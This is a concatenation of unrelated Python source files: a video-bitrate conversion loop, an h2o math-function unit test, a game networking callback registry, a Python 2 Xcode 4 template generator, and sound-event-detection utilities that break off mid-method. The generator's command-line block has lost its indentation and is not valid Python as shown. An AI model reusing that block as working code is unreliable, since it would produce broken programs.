            # on the current behavior.
            path = path.strip('./')
            if path != '':
                file = os.path.join(path, file)
            fullfilename = file
            # Skip anything MediaInfo does not identify as a video.
            fileInfo = MediaInfo.parse(file)
            for track in fileInfo.tracks:
                if track.track_type == 'Video':
                    # Split off the extension.
                    (file, extension) = os.path.splitext(file)
                    # Skip files already converted or already marked no-convert.
                    if (not fullfilename.endswith(r'convert' + format)
                            and not os.path.exists(file + r'_convert' + format)
                            and not fullfilename.endswith(r'convert' + extension)
                            and not os.path.exists(file + r'_noconvert' + extension)):
                        if os.path.getsize(file + extension) > destiny_space * 1024 * 1024:
                            # First pass: cap the bitrate at the target and the
                            # height at 1080, keeping source values when lower.
                            bit_rate = int(detect_bit_rate(file + extension))
                            height = detect_height(file + extension)
                            if bit_rate > destiny_bitrate * 1000:
                                bit_rate = destiny_bitrate * 1000
                            if int(height) > 1080:
                                height = '1080'
                            print("初次转换视频码率为:" + str(bit_rate / 1000) + "kbps")
                            change_bat(file, extension, bit_rate, height)
                            # Still too large: shrink bitrate and height to 80%
                            # of the previous attempt until under the target.
                            while os.path.getsize(file + r'_convert' + format) > destiny_space * 1024 * 1024:
                                # Floor division: the old true division produced
                                # floats like 864.0, which ffmpeg's scale filter
                                # rejects as a height.
                                bit_rate = int(bit_rate) * 4 // 5
                                height = int(height) * 4 // 5
                                print("本次转换视频码率为:" + str(int(bit_rate / 1000)) + "kbps,视频宽度为:" + str(height) + "px")
                                change_bat(file, extension, bit_rate, height)
                        else:
                            # Small enough already: copy with a '_noconvert'
                            # name so later runs skip it (Windows `copy`).
                            all_path = r'copy /y "' + file + extension + r'" "' + file + r'_noconvert' + extension + r'"'
                            os.system(all_path)
        except Exception:
            # Best-effort batch job: skip unreadable/odd files, but no longer
            # swallow KeyboardInterrupt/SystemExit like the old bare except.
            continue
|
import sys
sys.path.insert(1, "../../../")
import h2o
import numpy as np
import random
import math
import scipy.special
def vec_math_ops(ip,port):
    """Pyunit: check H2OFrame element-wise math ops against numpy/scipy/math references."""
    # Random 10x10 inputs restricted to each function family's valid domain.
    sin_cos_tan_atan_sinh_cosh_tanh_asinh_data = [[random.uniform(-10,10) for r in range(10)] for c in range(10)]
    asin_acos_atanh_data = [[random.uniform(-1,1) for r in range(10)] for c in range(10)]
    acosh_data = [[random.uniform(1,10) for r in range(10)] for c in range(10)]
    abs_data = [[random.uniform(-100000,0) for r in range(10)] for c in range(10)]
    # 2 x 10 frame of 0/1 values (both rows identical).
    zero_one_data = [random.randint(0,1) for c in range(10)]
    zero_one_data = [zero_one_data, zero_one_data]
    h2o_data1 = h2o.H2OFrame(python_obj=sin_cos_tan_atan_sinh_cosh_tanh_asinh_data)
    h2o_data2 = h2o.H2OFrame(python_obj=asin_acos_atanh_data)
    h2o_data3 = h2o.H2OFrame(python_obj=acosh_data)
    h2o_data4 = h2o.H2OFrame(python_obj=abs_data)
    h2o_data5 = h2o.H2OFrame(python_obj=zero_one_data)
    np_data1 = np.array(sin_cos_tan_atan_sinh_cosh_tanh_asinh_data)
    np_data2 = np.array(asin_acos_atanh_data)
    np_data3 = np.array(acosh_data)
    np_data4 = np.array(abs_data)
    np_data5 = np.array(zero_one_data)
    # Pick a random column to test.
    row, col = h2o_data1.dim
    c = random.randint(0,col-1)
    # On 0/1 data, signif with d digits must equal round with d+4 digits.
    for d in range(1,6):
        h2o_signif = h2o_data5[c].signif(digits=d)
        h2o_round = h2o_data5[c].round(digits=d+4)
        s = h2o_signif[0]
        r = h2o_round[0]
        assert s == r, "Expected these to be equal, but signif: {0}, round: {1}".format(s, r)
    # Transposing one 10-row column must give a 1 x 10 frame.
    h2o_transposed = h2o_data1[c].transpose()
    x, y = h2o_transposed.dim
    assert x == 1 and y == 10, "Expected 1 row and 10 columns, but got {0} rows and {1} columns".format(x,y)
    # Trigonometric / inverse-trig / hyperbolic functions vs numpy (10 decimal places).
    h2o.np_comparison_check(h2o_data1[:,c].cos(), np.cos(np_data1[:,c]), 10)
    h2o.np_comparison_check(h2o_data1[:,c].sin(), np.sin(np_data1[:,c]), 10)
    h2o.np_comparison_check(h2o_data1[:,c].tan(), np.tan(np_data1[:,c]), 10)
    h2o.np_comparison_check(h2o_data2[:,c].acos(), np.arccos(np_data2[:,c]), 10)
    h2o.np_comparison_check(h2o_data2[:,c].asin(), np.arcsin(np_data2[:,c]), 10)
    h2o.np_comparison_check(h2o_data1[:,c].atan(), np.arctan(np_data1[:,c]), 10)
    h2o.np_comparison_check(h2o_data1[:,c].cosh(), np.cosh(np_data1[:,c]), 10)
    h2o.np_comparison_check(h2o_data1[c].sinh(), np.sinh(np_data1[:,c]), 10)
    h2o.np_comparison_check(h2o_data1[c].tanh(), np.tanh(np_data1[:,c]), 10)
    h2o.np_comparison_check(h2o_data3[c].acosh(), np.arccosh(np_data3[:,c]), 10)
    h2o.np_comparison_check(h2o_data1[c].asinh(), np.arcsinh(np_data1[:,c]), 10)
    # Gamma-family functions checked at row 5 against math/scipy with relative tolerance.
    h2o_val = h2o_data3[c].gamma()[5,:]
    num_val = math.gamma(h2o_data3[5,c])
    assert abs(h2o_val - num_val) < max(abs(h2o_val), abs(num_val)) * 1e-6, \
        "check unsuccessful! h2o computed {0} and math computed {1}. expected equal gamma values between h2o and" \
        "math".format(h2o_val,num_val)
    h2o_val = h2o_data3[c].lgamma()[5,:]
    num_val = math.lgamma(h2o_data3[5,c])
    assert abs(h2o_val - num_val) < max(abs(h2o_val), abs(num_val)) * 1e-6, \
        "check unsuccessful! h2o computed {0} and math computed {1}. expected equal lgamma values between h2o and " \
        "math".format(h2o_val,num_val)
    h2o_val = h2o_data3[c].digamma()[5,:]._scalar()
    num_val = scipy.special.polygamma(0,h2o_data3[5,c])
    assert abs(h2o_val - num_val) < max(abs(h2o_val), abs(num_val)) * 1e-6, \
        "check unsuccessful! h2o computed {0} and math computed {1}. expected equal digamma values between h2o and " \
        "math".format(h2o_val,num_val)
    h2o_val = h2o_data3[c].trigamma()[5,:]
    num_val = scipy.special.polygamma(1,h2o_data3[5,c])
    assert abs(h2o_val - float(num_val)) < max(abs(h2o_val), abs(num_val)) * 1e-6, \
        "check unsuccessful! h2o computed {0} and math computed {1}. expected equal trigamma values between h2o and " \
        "math".format(h2o_val,num_val)
    # for c in range(col):
    #     h2o_val = h2o_data5[c].all()
    #     num_val = True if np.all(np_data5[:,c]) else False
    #     assert h2o_val == num_val, "check unsuccessful! h2o computed {0} and numpy computed {1}. expected equal " \
    #                                "values between h2o and numpy".format(h2o_val,num_val)
# Standalone pyunit entry point: defer to h2o's test runner.
if __name__ == "__main__":
    h2o.run_test(sys.argv, vec_math_ops)
|
<gh_stars>0
#!/usr/bin/env python3
'''
Copyright 2016 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
## @file
#
# This file implements the callback interface used to inform games that they've received net
# events. The game can provide their own functions/methods to be called, but for the most
# part, inheriting nClientCallback and nServerCallback should be sufficient.
#
# The Callback class is used internally only and should not be used by games.
#
# Your callback's name should be the message or event to which it applies. For example, if you
# want to respond to Chat messages, the name of that message will be "chat", so your callback
# should be named "chat". Callbacks without names will never be called.
#
# Regardless of where your callback will be called from, it will be passed a list of keyword
# arguments. If your callback is used to process network messages, the arguments will be the
# actual members of the message. In other situations, the callback arguments will be specified
# by the documentation for the appropriate situation.
## The callback list object. This object stores a list of callbacks. It is used internally
# to store registered callbacks by the Transport object as well as the Protocol object. It
# can be used by an EventDispatcher object as well, but is not required.
#
# By default, callbacks are stored as lists for the event to which they refer. This means
# that multiple callbacks can be registered for the same event, and they will be called in
# arbitrary order, unless specified otherwise by callback options.
class CallbackList(object):
    """Stores lists of callbacks keyed by event/message name.

    Multiple callbacks may be registered under the same name; they are kept
    in registration order, but callers should not rely on execution order
    unless callback options say otherwise.
    """

    ## The actual callback storage: dict mapping name -> list of
    # {'callback': func, 'options': dict} records.
    __callbacks = None

    def __init__(self):
        super().__init__()
        self.__callbacks = {}

    ## Register a callback.
    #
    # @param name the name of the callback. It should be a specific message or event type,
    # such as "chat" or "login" or "timeout".
    # @param func the function that will be called. It should take a keyword list of arguments.
    # @param options the options for the callback, which depend on the callback type.
    def RegisterCallback(self, name, func, options=None):
        # BUG FIX: the previous mutable default (options={}) was a single dict
        # shared by every registration that omitted options, so a mutation
        # through one registration leaked into all of them. Create a fresh
        # dict per call instead.
        if options is None:
            options = {}
        if name not in self.__callbacks:
            self.__callbacks[name] = []
        self.__callbacks[name].append({
            'callback': func,
            'options': options,
        })

    ## Gets the list of callback objects for a specific name. These callback objects can
    # then be executed immediately, if desired, or scheduled to be executed later, for example
    # by a different thread. See Callback for more information.
    #
    # @param name the name of the callback.
    # @return a (possibly empty) list of freshly constructed Callback objects.
    def GetCallbacks(self, name):
        retList = []
        if name in self.__callbacks:
            for a in self.__callbacks[name]:
                retList.append(Callback(name=name,
                                        callback=a['callback'],
                                        options=a['options']))
        else:
            print("Couldn't find callback: " + str(name))
        return retList

    ## Returns the options for the specified callback. It does not return the actual callback
    # itself, just the options for it. Note that only the options for the first registered
    # callback are returned, and those are usually supplied by the library.
    # Returns None when nothing is registered under *name*.
    def GetCallbackOptions(self, name):
        if name in self.__callbacks:
            return self.__callbacks[name][0]['options']
        # @todo raise a proper exception instead of silently returning None
        return None
## The callback class, used when a callback has to be queued up to be called from the main thread.
# Wraps a callable together with its name, options, and the keyword arguments
# it will eventually be invoked with.
class Callback(object):
    ## The function that will be called.
    __callback = None
    ## The name of the callback.
    __name = None
    ## The argument list for when the callback is executed
    __args = None
    ## The options for the callback
    __options = None

    def __init__(self, **args):
        if 'callback' in args:
            self.__callback = args['callback']
        self.__options = {}
        if 'options' in args:
            self.__options = args['options']
        # 'name' is required; a KeyError here means the caller omitted it.
        self.__name = args['name']
        self.__args = {}

    ## @return the event/message name this callback responds to.
    def name(self):
        return self.__name

    ## When the callback is queued, call this to set the arguments that it'll need when called.
    # It takes a keyword list corresponding to the network message that's being responded to,
    # or the specific network event in the event that there's no network message associated.
    def setargs(self, args):
        self.__args = args

    def setname(self, name):
        self.__name = name

    def setcallback(self, callback):
        self.__callback = callback

    ## Actually calls the callback.
    #
    # @param args An optional dictionary containing any additional arguments intended for the
    # callback. It will be added to the local __args member, if provided.
    def Call(self, **args):
        theArgs = self.__args
        if len(args) > 0:
            # BUG FIX: iterating a dict directly yields only its keys, so the
            # old `for key, value in args:` raised ValueError on any extra
            # argument; iterate .items() to get (key, value) pairs.
            for key, value in args.items():
                theArgs[key] = value
        self.__callback(**theArgs)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Xcode 4 template generator for cocos2d project
# (c) 2011 <NAME>
#
# LICENSE: Dual License: MIT & GNU GPL v2 Whatever suits you best.
#
# Given a directory, it generates the "Definitions" and "Nodes" elements
#
# Format taken from: http://blog.boreal-kiss.net/2011/03/11/a-minimal-project-template-for-xcode-4/
# ----------------------------------------------------------------------------
'''
Xcode 4 template generator
'''
__docformat__ = 'restructuredtext'
# Plist preamble; '%s' receives the template identifier.
_template_open_body = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<!-- FILE AUTOGENERATED BY cocos2d/tools/template_generator.py DO NOT EDIT -->
<plist version="1.0">
<dict>
<key>Description</key>
<string>This is a template description.</string>
<key>Identifier</key>
<string>com.cocos2d-v2.%s</string>
<key>Kind</key>
<string>Xcode.Xcode3.ProjectTemplateUnitKind</string>"""
# Plist closing tags.
_template_close_body = "</dict>\n</plist>"
# Targets fragment; '%s' receives the HEADER_SEARCH_PATHS value.
_template_header_path= """<key>Targets</key>
<array>
<dict>
<key>SharedSettings</key>
<dict>
<key>HEADER_SEARCH_PATHS</key>
<string>%s</string>
</dict>
</dict>
</array>"""
# Targets fragment; '%s' receives the USER_HEADER_SEARCH_PATHS value.
_template_user_header_path= """<key>Targets</key>
<array>
<dict>
<key>SharedSettings</key>
<dict>
<key>ALWAYS_SEARCH_USER_PATHS</key>
<string>YES</string>
<key>USER_HEADER_SEARCH_PATHS</key>
<string>%s</string>
</dict>
</dict>
</array>"""
# Ancestors fragment; '%s' receives the ancestor template identifier.
_template_ancestor = """ <key>Ancestors</key>
<array>
<string>%s</string>
</array>"""
# python
import sys
import os
import getopt
import glob
class Xcode4Template(object):
    """Generates an Xcode 4 TemplateInfo.plist for a directory tree.

    Walks *directory*, collects every file, and renders the "Definitions"
    and "Nodes" plist sections (plus optional header-search-path and
    ancestor fragments) to stdout. (Python 2 script.)
    """
    def __init__(self, directory, group=0, identifier="XXX", header_path=None, user_header_path=None, ancestor=None):
        self.directory = directory
        self.files_to_include = []
        self.wildcard = '*'
        # Extensions whose files must not be added to any target (not indexed).
        self.ignore_extensions = ['h','txt','html','patch','cmake', 'py', 'markdown', 'md', 'graffle', 'sh', 'ini', 'bridgesupport', 'tbl', 'msg']
        # Directories whose contents are excluded entirely.
        self.ignore_directories = ['docs', 'html']
        self.group_start_index = group # eg: if 1 then libs/cocos2d/support -> ["cocos2d", "support"] ignoring "libs"
        self.output = []
        self.identifier = identifier
        self.header_path = header_path
        self.user_header_path = user_header_path
        self.ancestor = ancestor
    def scandirs(self, path):
        """Recursively collect every file under *path* into files_to_include."""
        for currentFile in glob.glob(os.path.join(path, self.wildcard)):
            if os.path.isdir(currentFile):
                self.scandirs(currentFile)
            else:
                self.files_to_include.append(currentFile)
    #
    # append the definitions
    #
    def append_definition(self, output_body, path, group, dont_index):
        """Append one <key>/<dict> definition entry for *path* to output_body."""
        output_body.append("\t\t<key>%s</key>" % path)
        output_body.append("\t\t<dict>")
        if group:
            output_body.append("\t\t\t<key>Group</key>")
            output_body.append("\t\t\t<array>")
            for g in group:
                output_body.append("\t\t\t\t<string>%s</string>" % g)
            output_body.append("\t\t\t</array>")
        output_body.append("\t\t\t<key>Path</key>\n\t\t\t<string>%s</string>" % path)
        if dont_index:
            # An empty TargetIndices array keeps the file out of every target.
            output_body.append("\t\t\t<key>TargetIndices</key>\n\t\t\t<array/>")
        output_body.append("\t\t</dict>")
    #
    # Generate the "Definitions" section
    #
    def generate_definitions(self):
        """Render the plist "Definitions" dictionary for all collected files."""
        output_header = "\t<key>Definitions</key>"
        output_dict_open = "\t<dict>"
        output_dict_close = "\t</dict>"
        output_body = []
        for path in self.files_to_include:
            # group name
            group = []
            # obtain group name from directory
            dirs = os.path.dirname(path)
            lastdir = dirs.split(os.path.sep)[-1]
            if lastdir in self.ignore_directories:
                sys.stderr.write('Ignoring definition: "%s" because it is in directory: "%s"\n' % (os.path.basename(path), lastdir))
                continue
            # NOTE(review): splits on '/' rather than os.path.sep — confirm on Windows.
            group = dirs.split('/')
            group = group[self.group_start_index:]
            # get the extension
            filename = os.path.basename(path)
            name_extension= filename.split('.')
            extension = None
            # NOTE(review): only single-dot names get an extension; a name like
            # "foo.tar.gz" falls through with extension None and is indexed.
            if len(name_extension) == 2:
                extension = name_extension[1]
            self.append_definition(output_body, path, group, extension in self.ignore_extensions)
        self.output.append(output_header)
        self.output.append(output_dict_open)
        self.output.append("\n".join(output_body))
        self.output.append(output_dict_close)
    #
    # Generates the "Nodes" section
    #
    def generate_nodes(self):
        """Render the plist "Nodes" array listing every included file."""
        output_header = "\t<key>Nodes</key>"
        output_open = "\t<array>"
        output_close = "\t</array>"
        output_body = []
        for path in self.files_to_include:
            lastdir = os.path.dirname(path).split(os.path.sep)[-1]
            if lastdir in self.ignore_directories:
                sys.stderr.write('Ignoring node: "%s" because it is in directory: "%s"\n' % (os.path.basename(path), lastdir))
                continue
            output_body.append("\t\t<string>%s</string>" % path)
        self.output.append(output_header)
        self.output.append(output_open)
        self.output.append("\n".join(output_body))
        self.output.append(output_close)
    #
    # Generate ancestors
    #
    def generate_ancestor(self):
        """Append the Ancestors fragment when an ancestor identifier was given."""
        if self.ancestor:
            self.output.append(_template_ancestor % self.ancestor)
    #
    # Generates the include directory
    #
    def generate_header_path(self):
        """Append header-search-path fragments when paths were supplied."""
        if self.header_path:
            self.output.append(_template_header_path % self.header_path)
        if self.user_header_path:
            self.output.append(_template_user_header_path % self.user_header_path)
    #
    # Generates the plist. Send it to to stdout
    #
    def generate_xml(self):
        """Assemble all plist sections and print the document to stdout."""
        self.output.append(_template_open_body % self.identifier)
        self.generate_ancestor()
        self.generate_definitions()
        self.generate_nodes()
        self.generate_header_path()
        self.output.append(_template_close_body)
        print "\n".join(self.output)
    def generate(self):
        """Scan the directory tree, then emit the template plist."""
        self.scandirs(self.directory)
        self.generate_xml()
def help():
    """Print usage information and exit with status -1 (Python 2 script)."""
    print "%s v1.1 - An utility to generate Xcode 4 templates" % sys.argv[0]
    print "Usage:"
    print "-g --group\t\tdirectory_used_as_starting_group (if 1, then 'libs/cocos2d/Support/' -> ['cocos2d','Support'] ignoring 'libs')"
    print "-i --identifier\t\tidentifier (Xcode4 template identifier)"
    print "-a --ancestor\t\tancestor identifier. Default: none"
    print "--header-path\t\theader search path"
    print "--user-header-path\tuser header search path"
    print "directory_to_parse"
    print "\nExample:"
    print "\t%s -i kazmathlib --header-path ___PACKAGENAME___/libs/kazmath/include libs" % sys.argv[0]
    print "\t%s -i cocos2dlib libs" % sys.argv[0]
    sys.exit(-1)
if __name__ == "__main__":
if len(sys.argv) == 1:
help()
directory = None
group = 0
identifier = None
header_path= None
user_header_path= None
ancestor = None
argv = sys.argv[1:]
try:
opts, args = getopt.getopt(argv, "a:g:i:", ["ancestor=","group=","identifier=","header-path=", "user-header-path="])
if len(args) == 0:
help()
for opt, arg in opts:
if opt in ("-g","--group"):
group = arg
if opt in ("-i","--identifier"):
identifier = arg
if opt in ["--header-path"]:
header_path= arg
if opt in ["--user-header-path"]:
user_header_path= arg
if opt in ("-a", "--ancestor"):
ancestor = arg
except getopt.GetoptError,e:
print e
directory = args[0]
if directory == None:
help()
gen = Xcode4Template(directory=directory, group=int(group), identifier=identifier, header_path=header_path, user_header_path=user_header_path, ancestor=ancestor)
gen.generate()
|
#Some codes are adopted from https://github.com/DCASE-REPO/DESED_task
import torch
import torch.nn as nn
import torchaudio
from torch.utils.data import Sampler
import os
import math
import scipy
from pathlib import Path
from utils.evaluation_measures import compute_sed_eval_metrics
from utils.dataset import *
class Encoder:
    """Converts between event annotations (label/onset/offset in seconds) and
    frame-level binary label matrices for sound event detection.

    net_pooling accounts for temporal pooling inside the network; sr is the
    audio sample rate in Hz; audio_len is the clip length in seconds.
    """
    def __init__(self, labels, audio_len, frame_len, frame_hop, net_pooling=1, sr=16000):
        # NOTE(review): np.array is a function, not a type, so only the
        # np.ndarray branch of this membership test can ever match.
        if type(labels) in [np.ndarray, np.array]:
            labels = labels.tolist()
        self.labels = labels
        self.audio_len = audio_len
        self.frame_len = frame_len
        self.frame_hop = frame_hop
        self.sr = sr
        self.net_pooling = net_pooling
        n_samples = self.audio_len * self.sr
        # Number of network output frames for one clip (rounded up to an even
        # count of STFT frames before pooling).
        self.n_frames = int(math.ceil(n_samples/2/self.frame_hop)*2 / self.net_pooling)
    def _time_to_frame(self, time):
        """Convert seconds to a (fractional) output-frame index, clipped to [0, n_frames]."""
        sample = time * self.sr
        frame = sample / self.frame_hop
        return np.clip(frame / self.net_pooling, a_min=0, a_max=self.n_frames)
    def _frame_to_time(self, frame):
        """Convert an output-frame index back to seconds, clipped to the clip length."""
        time = frame * self.net_pooling * self.frame_hop / self.sr
        return np.clip(time, a_min=0, a_max=self.audio_len)
    def encode_strong_df(self, events_df):
        """Build a strong label matrix [n_frames, n_class] from an events dataframe."""
        # from event dict, generate strong label tensor sized as [n_frame, n_class]
        true_labels = np.zeros((self.n_frames, len(self.labels)))
        for _, row in events_df.iterrows():
            if not pd.isna(row['event_label']):
                label_idx = self.labels.index(row["event_label"])
                onset = int(self._time_to_frame(row["onset"])) # floor: a frame is active if the event overlaps it
                offset = int(np.ceil(self._time_to_frame(row["offset"]))) # ceil: a frame is active if the event overlaps it
                true_labels[onset:offset, label_idx] = 1
        return true_labels
    def encode_weak(self, events):
        """Build a clip-level (weak) label vector [n_class] from a list of event labels."""
        # from event dict, generate weak label tensor sized as [n_class]
        labels = np.zeros((len(self.labels)))
        if len(events) == 0:
            return labels
        else:
            for event in events:
                labels[self.labels.index(event)] = 1
            return labels
    def decode_strong(self, outputs):
        """Turn a binary [n_frame, n_class] matrix into [label, onset, offset] rows (seconds)."""
        #from the network output sized [n_frame, n_class], generate the label/onset/offset lists
        pred = []
        for i, label_column in enumerate(outputs.T): #outputs size = [n_class, frames]
            change_indices = self.find_contiguous_regions(label_column)
            for row in change_indices:
                onset = self._frame_to_time(row[0])
                offset = self._frame_to_time(row[1])
                onset = np.clip(onset, a_min=0, a_max=self.audio_len)
                offset = np.clip(offset, a_min=0, a_max=self.audio_len)
                pred.append([self.labels[i], onset, offset])
        return pred
    def decode_weak(self, outputs):
        """Turn a binary [n_class] vector into the list of active label names."""
        result_labels = []
        for i, value in enumerate(outputs):
            if value == 1:
                result_labels.append(self.labels[i])
        return result_labels
    def find_contiguous_regions(self, array):
        """Return an array of [start, end) frame index pairs where *array* is active."""
        #find at which frame the label changes in the array
        change_indices = np.logical_xor(array[1:], array[:-1]).nonzero()[0]
        #shift indices to focus the frame after
        change_indices += 1
        if array[0]:
            #if first element of array is True(1), add 0 in the beggining
            #change_indices = np.append(0, change_indices)
            change_indices = np.r_[0, change_indices]
        if array[-1]:
            #if last element is True, add the length of array
            change_indices = np.r_[change_indices, array.size]
        #reshape the result into two columns
        return change_indices.reshape((-1, 2))
def decode_pred_batch(outputs, weak_preds, filenames, encoder, thresholds, median_filter, decode_weak, pad_idx=None):
    """Decode a batch of framewise network outputs into event prediction dataframes.

    Args:
        outputs: tensor [batch, n_class, frames] of strong (framewise) scores.
        weak_preds: tensor [batch, n_class] of clip-level scores.
        filenames: list of audio file paths, one per batch item.
        encoder: Encoder instance turning binary frame activity into
            (label, onset, offset) rows.
        thresholds: iterable of score thresholds; one dataframe per threshold.
        median_filter: length (frames) of the median smoothing window.
        decode_weak: 0 = strong predictions only; 1 = mask strong predictions
            with weak ones; >1 = use weak predictions only (weak SED).
        pad_idx: optional tensor of valid-length fractions per batch item.

    Returns:
        dict mapping threshold -> pd.DataFrame with columns
        [event_label, onset, offset, filename].
    """
    from scipy import ndimage  # local import: scipy.ndimage.filters is deprecated

    pred_dfs = {threshold: pd.DataFrame() for threshold in thresholds}
    for batch_idx in range(outputs.shape[0]):  # outputs size = [bs, n_class, frames]
        for c_th in thresholds:
            output = outputs[batch_idx]  # [n_class, frames]
            if pad_idx is not None:
                # BUG FIX: `.item` without parentheses multiplied by a bound
                # method (TypeError); call it. Also slice the *frame* axis —
                # `output[:true_len]` truncated the class axis instead.
                true_len = int(output.shape[-1] * pad_idx[batch_idx].item())
                output = output[:, :true_len]
            output = output.transpose(0, 1).detach().cpu().numpy()  # [frames, n_class]
            if decode_weak:  # decode_weak == 1 (masking) or >= 2 (weak only)
                for class_idx in range(weak_preds.size(1)):
                    if weak_preds[batch_idx, class_idx] < c_th:
                        output[:, class_idx] = 0
                    elif decode_weak > 1:  # use only weak predictions (weakSED)
                        output[:, class_idx] = 1
            if decode_weak < 2:  # weak prediction masking
                output = output > c_th
                output = ndimage.median_filter(output, (median_filter, 1))
            pred = encoder.decode_strong(output)
            pred = pd.DataFrame(pred, columns=["event_label", "onset", "offset"])
            pred["filename"] = Path(filenames[batch_idx]).stem + ".wav"
            # DataFrame.append was removed in pandas 2.0; concatenate instead.
            pred_dfs[c_th] = pd.concat([pred_dfs[c_th], pred], ignore_index=True)
    return pred_dfs
class ConcatDatasetBatchSampler(Sampler):
    """Batch sampler over several concatenated datasets.

    Each yielded batch is the concatenation of one sub-batch per dataset:
    batch_sizes[i] indices drawn from samplers[i], offset into the index
    space of the concatenated dataset.
    """
    def __init__(self, samplers, batch_sizes, epoch=0):
        self.batch_sizes = batch_sizes
        self.samplers = samplers # one sampler per dataset
        self.offsets = [0] + np.cumsum([len(x) for x in self.samplers]).tolist()[:-1] # cumulative sum of sampler lengths
        self.epoch = epoch
        self.set_epoch(self.epoch)
    def _iter_one_dataset(self, c_batch_size, c_sampler, c_offset):
        # NOTE(review): `batch` is never cleared after a yield, so this helper
        # yields at most one batch; it is unused by __iter__ — confirm before use.
        batch = []
        for idx in c_sampler:
            batch.append(c_offset + idx)
            if len(batch) == c_batch_size:
                yield batch
    def set_epoch(self, epoch):
        # Propagate the epoch to samplers that support epoch-based shuffling.
        if hasattr(self.samplers[0], "epoch"):
            for s in self.samplers:
                s.set_epoch(epoch)
    def __iter__(self):
        iterators = [iter(i) for i in self.samplers]
        tot_batch = []
        for b_num in range(len(self)): # one iteration per combined batch
            for samp_idx in range(len(self.samplers)): # one sub-batch per sampler
                c_batch = [] # current sub-batch
                while len(c_batch) < self.batch_sizes[samp_idx]: # draw batch_sizes[samp_idx] offset indices from this sampler
                    c_batch.append(self.offsets[samp_idx] + next(iterators[samp_idx]))
                tot_batch.extend(c_batch)
            yield tot_batch
            tot_batch = []
    def __len__(self):
        # Number of batches: the smallest len(sampler) // batch_size over datasets.
        min_len = float("inf")
        for idx, sampler in enumerate(self.samplers):
            c_len = (len(sampler)) // self.batch_sizes[idx]
            min_len = min(c_len, min_len)
        return min_len # each dataset length divided by its batch size; return the smallest
class ExponentialWarmup(object):
    """Learning-rate scheduler with an exponential warm-up ramp.

    The learning rate is max_lr * exp(exponent * (1 - t)**2) where
    t = step_num / rampup_length (clipped to [0, 1]); once step_num reaches
    rampup_length the rate settles at max_lr. A rampup_length of 0 disables
    the ramp entirely.
    """

    def __init__(self, optimizer, max_lr, rampup_length, exponent=-5.0):
        self.optimizer = optimizer
        self.rampup_length = rampup_length
        self.max_lr = max_lr
        self.step_num = 1
        self.exponent = exponent

    def zero_grad(self):
        """Forward gradient clearing to the wrapped optimizer."""
        self.optimizer.zero_grad()

    def _get_lr(self):
        """Current learning rate: max_lr scaled by the warm-up factor."""
        return self.max_lr * self._get_scaling_factor()

    def _set_lr(self, lr):
        """Write *lr* into every parameter group of the wrapped optimizer."""
        for group in self.optimizer.param_groups:
            group["lr"] = lr

    def step(self):
        """Advance one step and push the updated learning rate to the optimizer."""
        self.step_num += 1
        self._set_lr(self._get_lr())

    def _get_scaling_factor(self):
        """Warm-up multiplier in (0, 1]; exactly 1.0 when the ramp is disabled."""
        if self.rampup_length == 0:
            return 1.0
        progress = np.clip(self.step_num, 0.0, self.rampup_length)
        remaining = 1.0 - progress / self.rampup_length
        return float(np.exp(self.exponent * remaining * remaining))
def update_ema(net, ema_net, step, ema_factor):
    """Update *ema_net* in place as an exponential moving average of *net*.

    The decay ramps from 0 toward ema_factor as training progresses
    (decay = min(1 - 1/step, ema_factor)), so early steps track *net*
    closely. Returns the (mutated) ema_net.
    """
    decay = min(1 - 1 / step, ema_factor)
    for ema_p, src_p in zip(ema_net.parameters(), net.parameters()):
        ema_p.data.mul_(decay).add_(src_p.data, alpha=1 - decay)
    return ema_net
def log_sedeval_metrics(predictions, ground_truth, save_dir=None):
    """ Return the set of metrics from sed_eval
    Args:
        predictions: pd.DataFrame, the dataframe of predictions.
        ground_truth: path to a tab-separated groundtruth file (read with pd.read_csv).
        save_dir: str, path to the folder where to save the event and segment based metrics outputs.
    Returns:
        tuple, event-based macro-F1 and micro-F1, segment-based macro-F1 and micro-F1
    """
    # Nothing predicted: all four F1 scores are zero by convention.
    if predictions.empty:
        return 0.0, 0.0, 0.0, 0.0
    gt = pd.read_csv(ground_truth, sep="\t")
    event_res, segment_res = compute_sed_eval_metrics(predictions, gt)
    # Optionally persist the full sed_eval reports as text files.
    if save_dir is not None:
        os.makedirs(save_dir, exist_ok=True)
        with open(os.path.join(save_dir, "event_f1.txt"), "w") as f:
            f.write(str(event_res))
        with open(os.path.join(save_dir, "segment_f1.txt"), "w") as f:
            f.write(str(segment_res))
    return (
        event_res.results()["class_wise_average"]["f_measure"]["f_measure"],
        event_res.results()["overall"]["f_measure"]["f_measure"],
        segment_res.results()["class_wise_average"]["f_measure"]["f_measure"],
        segment_res.results()["overall"]["f_measure"]["f_measure"],
    ) # return also segment measures
class Scaler(nn.Module):
    """Normalizes input features per-instance or with dataset statistics.

    statistic: "instance" (stats computed on the fly per input) or "dataset"
        (expects precomputed self.mean / self.mean_squared — set elsewhere,
        not visible in this module).
    normtype: "mean", "standard" or (instance mode only) "minmax".
    dims: dimensions over which statistics are computed.
    eps: small constant avoiding division by zero.
    """
    def __init__(self, statistic="instance", normtype="minmax", dims=(0, 2), eps=1e-8):
        super(Scaler, self).__init__()
        self.statistic = statistic
        self.normtype = normtype
        self.dims = dims
        self.eps = eps
    def load_state_dict(self, state_dict, strict=True):
        # Only dataset-level statistics are persisted; instance mode is stateless.
        if self.statistic == "dataset":
            super(Scaler, self).load_state_dict(state_dict, strict)
    def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,
                              missing_keys, unexpected_keys, error_msgs):
        if self.statistic == "dataset":
            super(Scaler, self)._load_from_state_dict(state_dict, prefix, local_metadata, strict, missing_keys,
                                                      unexpected_keys, error_msgs)
    def forward(self, input):
        """Return the normalized input; raises NotImplementedError for unsupported modes."""
        if self.statistic == "dataset":
            # NOTE(review): self.mean / self.mean_squared are assumed to be set
            # externally (e.g. as buffers) before this mode is used — confirm.
            if self.normtype == "mean":
                return input - self.mean
            elif self.normtype == "standard":
